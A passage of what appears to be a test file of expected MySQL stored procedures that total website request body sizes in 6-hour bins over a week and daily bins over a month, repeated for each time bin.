OUT entry0 FLOAT,
OUT entry1 FLOAT,
OUT entry2 FLOAT,
OUT entry3 FLOAT,
OUT entry4 FLOAT,
OUT entry5 FLOAT,
OUT entry6 FLOAT,
OUT entry7 FLOAT,
OUT entry8 FLOAT,
OUT entry9 FLOAT,
OUT entry10 FLOAT,
OUT entry11 FLOAT,
OUT entry12 FLOAT,
OUT entry13 FLOAT,
OUT entry14 FLOAT,
OUT entry15 FLOAT,
OUT entry16 FLOAT,
OUT entry17 FLOAT,
OUT entry18 FLOAT,
OUT entry19 FLOAT,
OUT entry20 FLOAT,
OUT entry21 FLOAT,
OUT entry22 FLOAT,
OUT entry23 FLOAT,
OUT entry24 FLOAT,
OUT entry25 FLOAT,
OUT entry26 FLOAT,
OUT entry27 FLOAT,
OUT start_hour FLOAT
)
BEGIN
select HOUR(now()) INTO start_hour;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 168 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 162 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry0 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 168 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 162 HOUR) AND Websiteid = id limit 1);
else SET entry0 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 162 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 156 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry1 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 162 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 156 HOUR) AND Websiteid = id limit 1);
else SET entry1 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 156 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 150 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry2 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 156 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 150 HOUR) AND Websiteid = id limit 1);
else SET entry2 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 150 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 144 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry3 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 150 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 144 HOUR) AND Websiteid = id limit 1);
else SET entry3 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 144 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 138 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry4 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 144 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 138 HOUR) AND Websiteid = id limit 1);
else SET entry4 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 138 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 132 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry5 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 138 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 132 HOUR) AND Websiteid = id limit 1);
else SET entry5 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 132 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 126 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry6 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 132 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 126 HOUR) AND Websiteid = id limit 1);
else SET entry6 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 126 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 120 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry7 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 126 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 120 HOUR) AND Websiteid = id limit 1);
else SET entry7 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 120 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 114 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry8 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 120 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 114 HOUR) AND Websiteid = id limit 1);
else SET entry8 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 114 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 108 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry9 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 114 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 108 HOUR) AND Websiteid = id limit 1);
else SET entry9 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 108 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 102 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry10 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 108 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 102 HOUR) AND Websiteid = id limit 1);
else SET entry10 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 102 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 96 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry11 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 102 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 96 HOUR) AND Websiteid = id limit 1);
else SET entry11 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 96 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 90 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry12 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 96 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 90 HOUR) AND Websiteid = id limit 1);
else SET entry12 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 90 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 84 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry13 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 90 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 84 HOUR) AND Websiteid = id limit 1);
else SET entry13 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 84 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 78 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry14 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 84 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 78 HOUR) AND Websiteid = id limit 1);
else SET entry14 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 78 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 72 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry15 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 78 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 72 HOUR) AND Websiteid = id limit 1);
else SET entry15 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 72 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 66 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry16 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 72 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 66 HOUR) AND Websiteid = id limit 1);
else SET entry16 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 66 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 60 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry17 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 66 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 60 HOUR) AND Websiteid = id limit 1);
else SET entry17 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 60 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 54 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry18 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 60 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 54 HOUR) AND Websiteid = id limit 1);
else SET entry18 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 54 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 48 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry19 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 54 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 48 HOUR) AND Websiteid = id limit 1);
else SET entry19 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 48 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 42 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry20 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 48 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 42 HOUR) AND Websiteid = id limit 1);
else SET entry20 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 42 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 36 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry21 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 42 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 36 HOUR) AND Websiteid = id limit 1);
else SET entry21 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 36 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 30 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry22 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 36 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 30 HOUR) AND Websiteid = id limit 1);
else SET entry22 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 30 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 24 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry23 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 30 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 24 HOUR) AND Websiteid = id limit 1);
else SET entry23 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 24 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 18 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry24 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 24 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 18 HOUR) AND Websiteid = id limit 1);
else SET entry24 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 18 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 12 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry25 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 18 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 12 HOUR) AND Websiteid = id limit 1);
else SET entry25 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 12 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 6 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry26 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 12 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 6 HOUR) AND Websiteid = id limit 1);
else SET entry26 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 6 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 0 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry27 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 6 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 0 HOUR) AND Websiteid = id limit 1);
else SET entry27 := 0;
end if;
END//
delimiter ;
"""
EXPECTED_MONTHLY_WEBSITE_GENERATE_SAMPLES_QUERIES_SIZE = """delimiter //
DROP PROCEDURE IF EXISTS get_monthly_samples_size_websites;
CREATE PROCEDURE get_monthly_samples_size_websites (
IN id INT,
OUT entry0 FLOAT,
OUT entry1 FLOAT,
OUT entry2 FLOAT,
OUT entry3 FLOAT,
OUT entry4 FLOAT,
OUT entry5 FLOAT,
OUT entry6 FLOAT,
OUT entry7 FLOAT,
OUT entry8 FLOAT,
OUT entry9 FLOAT,
OUT entry10 FLOAT,
OUT entry11 FLOAT,
OUT entry12 FLOAT,
OUT entry13 FLOAT,
OUT entry14 FLOAT,
OUT entry15 FLOAT,
OUT entry16 FLOAT,
OUT entry17 FLOAT,
OUT entry18 FLOAT,
OUT entry19 FLOAT,
OUT entry20 FLOAT,
OUT entry21 FLOAT,
OUT entry22 FLOAT,
OUT entry23 FLOAT,
OUT entry24 FLOAT,
OUT entry25 FLOAT,
OUT entry26 FLOAT,
OUT entry27 FLOAT,
OUT entry28 FLOAT,
OUT entry29 FLOAT,
OUT entry30 FLOAT,
OUT start_hour FLOAT
)
BEGIN
select DAY(now()) INTO start_hour;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 31 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 30 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry0 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 31 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 30 DAY) AND Websiteid = id limit 1);
else SET entry0 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 30 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 29 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry1 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 30 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 29 DAY) AND Websiteid = id limit 1);
else SET entry1 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 29 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 28 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry2 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 29 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 28 DAY) AND Websiteid = id limit 1);
else SET entry2 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 28 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 27 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry3 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 28 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 27 DAY) AND Websiteid = id limit 1);
else SET entry3 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 27 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 26 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry4 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 27 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 26 DAY) AND Websiteid = id limit 1);
else SET entry4 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 26 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 25 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry5 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 26 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 25 DAY) AND Websiteid = id limit 1);
else SET entry5 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 25 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 24 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry6 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 25 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 24 DAY) AND Websiteid = id limit 1);
else SET entry6 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 24 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 23 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry7 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 24 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 23 DAY) AND Websiteid = id limit 1);
else SET entry7 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 23 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 22 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry8 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 23 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 22 DAY) AND Websiteid = id limit 1);
else SET entry8 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 22 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 21 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry9 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 22 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 21 DAY) AND Websiteid = id limit 1);
else SET entry9 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 21 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 20 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry10 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 21 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 20 DAY) AND Websiteid = id limit 1);
else SET entry10 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 20 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 19 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry11 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 20 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 19 DAY) AND Websiteid = id limit 1);
else SET entry11 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 19 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 18 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry12 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 19 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 18 DAY) AND Websiteid = id limit 1);
else SET entry12 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 18 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 17 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry13 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 18 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 17 DAY) AND Websiteid = id limit 1);
else SET entry13 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 17 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 16 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry14 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 17 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 16 DAY) AND Websiteid = id limit 1);
else SET entry14 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 16 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 15 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry15 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 16 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 15 DAY) AND Websiteid = id limit 1);
